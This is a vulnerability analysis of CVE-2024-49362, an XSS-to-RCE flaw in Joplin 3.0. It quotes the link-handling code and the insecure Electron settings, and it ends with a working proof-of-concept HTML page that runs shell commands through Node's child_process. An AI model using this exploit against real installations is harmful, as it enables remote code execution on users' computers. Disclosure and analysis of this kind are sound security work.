CVE-2024-49362: Joplin XSS-to-RCE Vulnerability Analysis

CVE-2024-49362

Affected versions

Joplin 3.0

Root cause

An `<a href=xxx>` link that carries the data-from-md attribute is handled directly: the click handler only intercepts it when the href is an in-note '#' anchor; for any other href it neither calls preventDefault nor forwards the link to the host, so the webview follows the link on its own.

```javascript
document.addEventListener('click', (event) => {
	const anchor = webviewLib.getParentAnchorElement(event.target);
	if (!anchor) return;

	if (!anchor.hasAttribute('data-from-md')) {
		if (webviewLib.handleInternalLink(event, anchor)) return;
		event.preventDefault();
		if (anchor.getAttribute('href')) webviewLib.options_.postMessage(anchor.getAttribute('href'));
		if (anchor.getAttribute('xlink:href')) webviewLib.options_.postMessage(anchor.getAttribute('xlink:href'));
		return;
	}
	// If this is an internal link, jump to the anchor directly
	if (anchor.hasAttribute('data-from-md')) {
		if (webviewLib.handleInternalLink(event, anchor)) return;
	}
});
```
```javascript
webviewLib.handleInternalLink = function(event, anchorNode) {
	const href = anchorNode.getAttribute('href');
	if (!href) return false;

	if (href.indexOf('#') === 0) {
		event.preventDefault();
		location.hash = href;
		return true;
	}

	return false;
};
```
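To make the fall-through visible, here is an added model of the two handlers above (not Joplin's code) that runs in Node with stand-in anchor and event objects. `dispatchClick` reports whether a click ends up as an in-note hash jump, a href handed to the host via postMessage, or a native navigation performed by the webview itself; the `hardened` flag is an assumed mitigation for illustration, not Joplin's actual patch.

```javascript
// Stand-ins for the DOM objects the handler touches (constructed for this example).
function makeAnchor(attrs) {
  const has = (name) => Object.prototype.hasOwnProperty.call(attrs, name);
  return {
    hasAttribute: has,
    getAttribute: (name) => (has(name) ? attrs[name] : null),
  };
}

function makeEvent() {
  return { defaultPrevented: false, preventDefault() { this.defaultPrevented = true; } };
}

// Same decision as webviewLib.handleInternalLink: only '#...' hrefs are handled here.
// The real code also sets location.hash; that side effect is omitted so this runs in Node.
function handleInternalLink(event, anchorNode) {
  const href = anchorNode.getAttribute('href');
  if (!href) return false;
  if (href.indexOf('#') === 0) {
    event.preventDefault();
    return true;
  }
  return false;
}

// Returns 'hash' (in-note anchor), 'host' (href forwarded to the host process) or
// 'native' (no preventDefault, so the node-integrated webview follows the href itself).
function dispatchClick(anchor, { hardened = false } = {}) {
  const event = makeEvent();
  const posted = [];
  if (!anchor.hasAttribute('data-from-md')) {
    if (handleInternalLink(event, anchor)) return { outcome: 'hash', posted };
    event.preventDefault();
    for (const attr of ['href', 'xlink:href']) {
      if (anchor.getAttribute(attr)) posted.push(anchor.getAttribute(attr));
    }
    return { outcome: 'host', posted };
  }
  if (handleInternalLink(event, anchor)) return { outcome: 'hash', posted };
  if (hardened) {
    // Assumed mitigation: treat a non-anchor data-from-md link like any other link,
    // so the webview never navigates to an external href on its own.
    event.preventDefault();
    if (anchor.getAttribute('href')) posted.push(anchor.getAttribute('href'));
    return { outcome: 'host', posted };
  }
  return { outcome: event.defaultPrevented ? 'host' : 'native', posted };
}
```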

The Electron security configuration sets nodeIntegration to true and contextIsolation to false, so the renderer process has full access to the Node.js API.

```typescript
const windowOptions: any = {
	x: windowState.x,
	y: windowState.y,
	width: windowState.width,
	height: windowState.height,
	minWidth: 100,
	minHeight: 100,
	backgroundColor: '#fff', // required to enable sub pixel rendering, can't be in css
	webPreferences: {
		nodeIntegration: true,
		contextIsolation: false,
		spellcheck: true,
		enableRemoteModule: true,
	},
	webviewTag: true,
	// remaining options omitted in the original excerpt
};
```

Reproduction

poc2.html

Use the Node.js API to obtain system-level command execution (RCE).

```html
<html>
<body>
<script>
	if (typeof window.parent.require !== 'undefined') {
		const { exec } = window.parent.require('child_process');
		exec('ls -al', (err, stdout, stderr) => {
			if (err) {
				document.body.innerText = `Error: ${err.message}`;
				return;
			}
			if (stderr) {
				document.body.innerText = `Stderr: ${stderr}`;
				return;
			}
			document.body.innerText = stdout;
		});
	} else {
		document.body.innerText = 'Require is not available in this environment.';
	}
</script>
</body>
</html>
```

References

https://github.com/advisories/GHSA-hff8-hjwv-j9q7